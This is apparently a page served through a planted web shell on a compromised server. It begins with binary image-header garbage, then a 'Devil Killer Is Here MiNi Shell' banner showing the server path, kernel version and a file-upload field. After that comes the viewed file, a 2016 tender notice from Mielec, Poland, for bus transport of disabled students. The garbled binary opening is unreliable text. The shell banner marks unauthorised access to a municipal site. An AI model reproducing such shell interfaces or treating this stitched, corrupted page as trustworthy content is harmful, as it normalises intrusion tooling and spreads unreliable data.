JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160727/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160727/163233-N-2016.html

<p class="kh_header"><b>Mielec: Dowóz uczniów z niepełnosprawnościami do Zespołu Szkół Ogólnokształcących nr 1                         w Mielcu oraz do Szkoły Podstawowej nr 11 w Mielcu i Specjalnego Ośrodka Szklono Wychowawczego w Mielcu w roku szkolnym 2016/2017</b><br>
<b>Numer ogłoszenia: 163233 - 2016; data zamieszczenia: 27.07.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Mielec , ul. Żeromskiego 26, 39-300 Mielec, woj. podkarpackie, tel. 17 7888500, faks 17 7888505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mielec.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowóz uczniów z niepełnosprawnościami do Zespołu Szkół Ogólnokształcących nr 1                         w Mielcu oraz do Szkoły Podstawowej nr 11 w Mielcu i Specjalnego Ośrodka Szklono Wychowawczego w Mielcu w roku szkolnym 2016/2017.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dowóz uczniów z niepełnosprawnościami w roku szkolnym 2016/2017:
Zadanie nr 1 -  do Zespołu Szkół Ogólnokształcących nr 1 w Mielcu przy ul. Tańskiego 3, 
Zadanie nr 2 - do Szkoły Podstawowej nr 11 w Mielcu oraz Specjalnego Ośrodka Szklono Wychowawczego w Mielcu. 
Opis przedmiotu zamówienia.
Zadanie nr 1 
Dowóz uczniów z niepełnosprawnościami do Zespołu Szkół Ogólnokształcących nr 1                             w Mielcu przy ul. Tańskiego 3 obejmuje 12 osób (1bus/autobus przystosowany do przewozu osób niepełnosprawnych), w tym 11 uczniów niepełnosprawnych poruszających się samodzielnie oraz 1 opiekuna dowozu. Przebieg dzienny środka transportu przewiduje się na ok. 45 km. Łączny dzienny przebieg to ok. 189 dni roboczych w okresie realizacji zamówienia.  

Wymagania dotyczące sposobu realizacji zamówienia:
1)	godziny przejazdów (dojazd i powrót) od poniedziałku do piątku w dni nauki szkolnej zostaną określone przed 1 września 2016 r. przez ZSO nr 1,
2)	odbiór uczniów będzie następował z wyznaczonych miejsc (szczegółowy wykaz uczniów 
z niepełnosprawnościami objętych dowożeniem z domu do szkoły i z powrotem, zawierający dokładne dane adresowe zostanie przekazany Wykonawcy przez Naczelnika Wydziału Edukacji Urzędu Miejskiego w Mielcu po rozstrzygnięciu przetargu i po podpisaniu umowy), 
3)	nie dopuszcza się przekazywania dzieci w drodze powrotnej ze szkół do domu osobom nieupoważnionym,
4)	Zamawiający, w ramach realizacji przedmiotowego zamówienia dopuszcza możliwość (opcję) zwiększenia ilości dowożonych uczniów maksymalnie do 50 % ogólnej liczby dowożonych,  tj. o 5 uczniów, bądź ich zmniejszenia o ok. 3 uczniów,
5)	opcja zwiększenia ilości dotyczy dowożonych dzieci na trasie dowozu do ZSO nr 1 
w Mielcu w okresie od 1 września 2016 r. do 30 czerwca 2017 r. i będzie miała zastosowanie   w przypadkach zgłoszenia przez rodziców/opiekunów nowych dzieci do dowozu w trakcie trwania roku szkolnego 2016 - 2017; Zamawiający zwiększając ilość dzieci objętych dowozem, przekaże stosowną informację Wykonawcy usługi,
6)	w przypadku zmian liczby dowożonych uczniów Wykonawca zobowiązuje się do dowożenia uczniów, zgodnie z przedstawionym mu nowym wykazem, z co najmniej 
3 -dniowym wyprzedzeniem,
7)	zaleca się przeprowadzenie wizji lokalnej dotyczącej ustalenia tras dowozu, 
w szczególności sprawdzenie ilości kilometrów w celu uzyskania informacji koniecznych do przygotowania oferty. Koszty wizji lokalnej ponosi Wykonawca,
8)	Wykonawca samodzielnie ustali najkrótsze i bezpieczne trasy dowozu dzieci, 
a Zamawiający po przeprowadzonej analizie dokona jej akceptacji,
9)	w oferowanych środkach transportu należy zapewnić miejsce siedzące dla opiekunów dowozu,
10)	czas trwania dowozu,odwozu dla poszczególnego dziecka nie może przekroczyć 1 godziny 15 minut,
11)	nie dopuszcza się przesadzania dzieci w trakcie dowozu do innego pojazdu,
12)	opiekunów do przewożonych uczniów z niepełnosprawnościami zapewnia Gmina Miejska Mielec,
13)	Wykonawca będzie zobowiązany do prowadzenia w każdym dniu pracy notatki z licznika odnośnie przebytych kilometrów dziennego przebiegu i przedstawiania  comiesięcznie pod fakturę zestawienia zbiorczego z faktycznie przebytych kilometrów.

Zadanie nr 2   
Dowóz uczniów z niepełnosprawnościami do Szkoły Podstawowej nr 11 w Mielcu - trasa nr I oraz do Specjalnego Ośrodka Szkolno - Wychowawczego w Mielcu - trasa nr II.

Trasa nr I dotyczy przewozu uczniów do Szkoły Podstawowej nr 11 z Oddziałami Integracyjnymi w Mielcu przy ul. Warneńczyka 2. Liczba osób do przewozu na tej trasie to   27 osób (1autobus niskopodłogowy), w tym 25 uczniów z niepełnosprawnościami poruszających się samodzielnie oraz 2 opiekunów dowozu - nauczycieli SP nr 11 w Mielcu. 

                               
                  





































Trasa nr II dotyczy przewozu uczniów do Specjalnego Ośrodka Szkolno - Wychowawczego w Mielcu przy ul. Królowej Jadwigi 1. Liczba osób do przewozu na tej trasie to 42 osoby (2 autobusy niskopodłogowe), w tym 1 uczeń z niepełnosprawnościami  poruszający się na wózku inwalidzkim, 37 uczniów z niepełnosprawnościami poruszający się samodzielnie, 4 opiekunów przewodu (po dwóch na 1 autobus). 



Łączny przebieg dzienny środków transportu na trasach I - II (3 autobusami niskopodłogowymi) przewiduje się na około 155 km. Łącznie jest to 189 dni roboczych 
w okresie realizacji przedmiotu zamówienia.

Wymagania dotyczące sposobu realizacji zamówienia:
1)	godziny przejazdów (dojazd i powrót) od poniedziałku do piątku w dni nauki szkolnej określą przed 1 września 2016 r. odpowiednio SP nr 11 i SOSW w Mielcu,
2)	odbiór uczniów będzie następował z wyznaczonych miejsc (szczegółowy wykaz uczniów z niepełnosprawnościami objętych dowożeniem z domu do szkoły i z powrotem, zawierający dokładne dane adresowe zostanie przekazany Wykonawcy przez Naczelnika Wydziału Edukacji Urzędu Miejskiego w Mielcu po rozstrzygnięciu przetargu i po podpisaniu umowy), 
3)	nie dopuszcza się przekazywania dzieci w drodze powrotnej ze szkół do domu osobom nieupoważnionym,
4)	Zamawiający, w ramach realizacji przedmiotowego zamówienia dopuszcza możliwość (opcję) zwiększenia ilości dowożonych uczniów maksymalnie do 20 % ogólnej liczby dowożonych,  tj. o 13 uczniów, bądź ich zmniejszenia o ok. 10 uczniów,
5)	opcja zwiększenia ilości dotyczy dowożonych dzieci na trasie dowozu do  
SP nr 11 i SOSW  w Mielcu w okresie od 1 września 2016 r. do 30 czerwca 2017 r. i będzie miała zastosowanie   w przypadkach zgłoszenia przez rodziców/opiekunów nowych dzieci do dowozu w trakcie trwania roku szkolnego 2016 - 2017. Zamawiający zwiększając ilość dzieci objętych dowozem, przekaże stosowną informację Wykonawcy usługi,
6)	w przypadku zmian liczby dowożonych uczniów Wykonawca zobowiązuje się do dowożenia uczniów, zgodnie z przedstawionym mu nowym wykazem, z co najmniej 
3 -dniowym wyprzedzeniem,
7)	zaleca się przeprowadzenie wizji lokalnej dotyczącej ustalenia tras dowozu, 
w szczególności sprawdzenie ilości kilometrów w celu uzyskania informacji koniecznych do przygotowania oferty; koszty wizji lokalnej ponosi Wykonawca,
8)	Wykonawca samodzielnie ustali najkrótsze i bezpieczne trasy dowozu dzieci, 
a Zamawiający po przeprowadzonej analizie dokona jej akceptacji,
9)	w oferowanych środkach transportu należy zapewnić miejsce siedzące dla opiekunów dowozu,
10)	czas trwania dowozu, odwozu dla poszczególnego dziecka nie może przekroczyć 1 godziny 15 minut,
11)	nie dopuszcza się przesadzania dzieci w trakcie dowozu do innego pojazdu,
12)	opiekunów do przewożonych uczniów z niepełnosprawnościami zapewnia Gmina Miejska Mielec,
13)	Wykonawca będzie zobowiązany do prowadzenia w każdym dniu pracy notatki z licznika odnośnie przebytych kilometrów dziennego przebiegu i przedstawiania  comiesięcznie pod fakturę zestawienia zbiorczego z faktycznie przebytych kilometrów..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 60.13.00.00-8, 60.10.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeśli Wykonawca wykaże, że posiada uprawnienia 
do wykonywania działalności w zakresie transportu drogowego osób na podstawie ustawy                       z dnia 6.09.2001 r. o transporcie drogowym (t. j. Dz. U. z 2015 r. poz. 2164 z późn. zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać się wiedzą i doświadczeniem, w wykonaniu (zakończeniu)                           w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej 1 usługi, polegającej na dowożeniu uczniów do jednostek oświatowych przez okres minimum  6 miesięcy.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie zadania nr 1:
a)	 na czas realizacji zadania dysponuje lub będzie dysponował minimum 1 sprawny  
technicznie środkiem transportu niskopodłogowym, specjalnie oznakowanym, spełniającym wymogi bezpieczeństwa i Kodeksu drogowego, posiadającym aktualne badania techniczne dopuszczające pojazd do ruchu drogowego, tablicę - Przewóz osób niepełnosprawnych umieszczoną wewnątrz pojazdu przy przedniej i tylnej szybie oraz żółte tablice z symbolem dzieci umieszczone z przodu i tyłu samochodu po lewej stronie. Część pasażerska pojazdu musi być ogrzewana. Proponowane do realizacji środki transportu nie mogą być starsze jak 10 lat na dzień złożenia oferty, który może przewieść minimum 11 osób,  
b)	 zapewni w przypadku awarii pojazdu transport zastępczy spełniający wymagania określone w SIWZ w taki sposób, aby nie powodować opóźnień czasowych kursu i nie powodować nadmiernego (ponad limit miejsc siedzących) zwiększenia liczby przewożonych uczniów;
W zakresie zadania nr 2
a)	 na czas realizacji zadania dysponuje lub będzie dysponował minimum 3 sprawnymi technicznie środkami transportu niskopodłogowymi, specjalnie oznakowanymi, spełniającymi wymogi bezpieczeństwa i Kodeksu drogowego, posiadające właściwe mocowanie wózków inwalidzkich, aktualne badania techniczne dopuszczające pojazdy do ruchu drogowego, tablicę - Przewóz osób niepełnosprawnych umieszczoną wewnątrz pojazdu przy przedniej i tylnej szybie oraz żółte tablice z symbolem dzieci umieszczone z przodu i tyłu samochodu po lewej stronie. Część pasażerska pojazdu musi być ogrzewana. Proponowane do realizacji środki transportu nie mogą być starsze jak 10 lat na dzień złożenia oferty, z których każdy z nich może przewieść minimum 25 osób, w tym 1 uczeń na wózku inwalidzkim, 
b)	 zapewni w przypadku awarii pojazdu transport zastępczy spełniający wymagania określone w SIWZ w taki sposób, aby nie powodować opóźnień czasowych kursu i nie powodować nadmiernego (ponad limit miejsc siedzących) zwiększenia liczby przewożonych uczniów;</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, że:
W zakresie zadania nr 1 - na czas realizacji zadania dysponuje lub będzie dysponował minimum 1 osobą (kierowcą), który posiada uprawnienia do kierowania pojazdem, posiada  prawo jazdy minimum kategorii  D oraz ukończone szkolenie z zakresu pierwszej pomocy przedmedycznej,
W zakresie zadania nr 2 - na czas realizacji zadania dysponuje lub będzie dysponował minimum 4 osobami (kierowcami), którzy posiadają uprawnienia do kierowania pojazdami, posiadają  prawo jazdy minimum kategorii  D oraz ukończone szkolenie z zakresu pierwszej pomocy przedmedycznej,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunków 
w tym zakresie. Zamawiający dokona oceny spełniania warunków udziału 
w postępowaniu w tym zakresie na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">próbki, opisy lub fotografie produktów, które mają zostać dostarczone, których autentyczność musi zostać poświadczona przez wykonawcę na żądanie zamawiającego;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Szczegółowy opis: fotografie środków transportu oferowanych do przewozu dzieci do ZSO nr 1, SP nr 11 i SOSW w Mielcu (kolorowe wydruki).
2. Oświadczenie o braku podstaw do wykluczenia z postępowania w okolicznościach, o których mowa w art. 24 ust. 2a ustawy Pzp</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>

<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy na podstawie art. 144 ust. 1 Prawa zamówień publicznych w przypadku:
1. zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy
2. siły wyższej
3. zmian godzin rozkładu jazdy</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mielec.pl;<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Mielcu, ul. Żeromskiego 26, pok. nr 30.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.08.2016 godzina 11:45, miejsce: Urząd Miejski w Mielcu, ul. Żeromskiego 26, pok. nr 30.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 -  do Zespołu Szkół Ogólnokształcących nr 1 w Mielcu przy ul. Tańskiego 3,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zadanie nr 1 
